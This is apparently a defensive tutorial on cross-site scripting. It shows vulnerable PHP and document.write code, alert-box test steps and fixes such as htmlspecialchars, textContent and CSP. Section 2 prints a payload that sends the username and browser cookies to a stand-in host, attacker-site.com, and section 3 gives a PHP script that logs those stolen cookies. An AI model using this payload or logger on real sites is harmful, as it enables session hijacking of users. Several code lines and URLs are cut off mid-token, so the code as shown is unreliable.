All examples in this article are provided for educational and
defensive purposes only.Test XSS vulnerabilities only on applications you own or have explicit
permission to test.
Cross-Site Scripting (XSS) is one of the most common web security
vulnerabilities.
It occurs when user-controlled input is included in a web page without
proper validation or escaping, allowing attackers to execute
JavaScript in a victim’s browser.
In this article we will cover:
Reflected XSS (server-side)
DOM-based XSS (client-side)
Why malicious payloads are dangerous
How to test XSS safely
Expected results during testing
1. Reflected XSS via PHP GET Parameters
Vulnerable Code Example
<?php
echo "Welcome " . $_GET["name"] . " " . $_GET["surname"] . "!";
?>
Why This Code Is Vulnerable
The application takes user input from $_GET parameters and prints it
directly into the HTML output.
Because no sanitization or escaping is applied, any injected
JavaScript will be executed by the browser.
How to Test
Where to test: browser address bar
How to test: inject a harmless JavaScript payload
http://www.example-site-xss.co
Expected Result
A JavaScript alert box appears in the browser.
This confirms the presence of a Reflected XSS vulnerability.
Why This Is Dangerous
An attacker could use this vulnerability to:
Steal session cookies
Perform actions on behalf of the victim
Redirect users to malicious pages
2. XSS Payload Example (Data Exfiltration)
Example Payload (Demonstration Only)
<script>
var user = document.getElementById('curre
? document.getElementById('curre
: 'unknown';
var cookie = document.cookie;
new Image().src =
'https://attacker-site.com/log
encodeURIComponent(user) +
'&cookie=' +
encodeURIComponent(cookie);
</script>
What This Payload Does
The script:
Reads data from the page (such as the username)
Reads browser cookies
Sends the information to an external server
Important Warning
This payload should not be used for testing.
It is shown only to demonstrate the real impact of an XSS vulnerability.
For testing purposes, always use non-destructive payloads such as:
<script>alert(1)</script>
3. Server-Side Logging Example
<?php
$user = isset($_GET['user']) ? $_GET['user'] : '';
$cookie = isset($_GET['cookie']) ? $_GET['cookie'] : '';
$log = date('Y-m-d H:i:s') . " | " .
$_SERVER['REMOTE_ADDR'] .
" | user=" . $user .
" | cookie=" . $cookie . "\n";
file_put_contents(__DIR__ . "/log.txt", $log, FILE_APPEND | LOCK_EX);
?>
Purpose of This Example
This code demonstrates how stolen data could be collected and logged
by an attacker, highlighting why XSS vulnerabilities are considered
high risk.
4. DOM-Based XSS Using location.hash
Vulnerable JavaScript Code
var name = location.hash.slice(1);
document.write("Welcome " + name);
Why This Is Vulnerable
The location.hash value is fully controlled by the user.
Using document.write() inserts unescaped content directly into the
page, resulting in DOM-based XSS.
How to Test
Where to test: browser URL
How to test: inject payload after the # symbol
http://www.example-site-xss.co
Expected Result
The alert box is displayed.
The payload is executed entirely in the browser without any
server-side involvement.
5. Using the Browser Console
The browser console is not used to inject XSS, but to analyze and debug it.
Examples:
console.log(location.hash);
document.body.innerHTML;
The console helps identify where user input is flowing and which
JavaScript sinks are dangerous.
6. How to Fix These Vulnerabilities
Secure PHP Output
echo "Welcome " .
htmlspecialchars($_GET['name'
htmlspecialchars($_GET['surna
Secure JavaScript Practices
Avoid:
document.write
innerHTML with user input
Use:
element.textContent = userInput;
Additional Security Measures
Use HttpOnly and Secure cookies
Implement a strong Content Security Policy (CSP)
Validate input and escape output
Treat all user input as untrusted
XSS vulnerabilities can occur both on the server side and in
client-side JavaScript.
Understanding where input enters the application and how it is
rendered is essential for preventing XSS attacks.
Always test responsibly, fix vulnerabilities promptly, and prioritize
secure coding practices.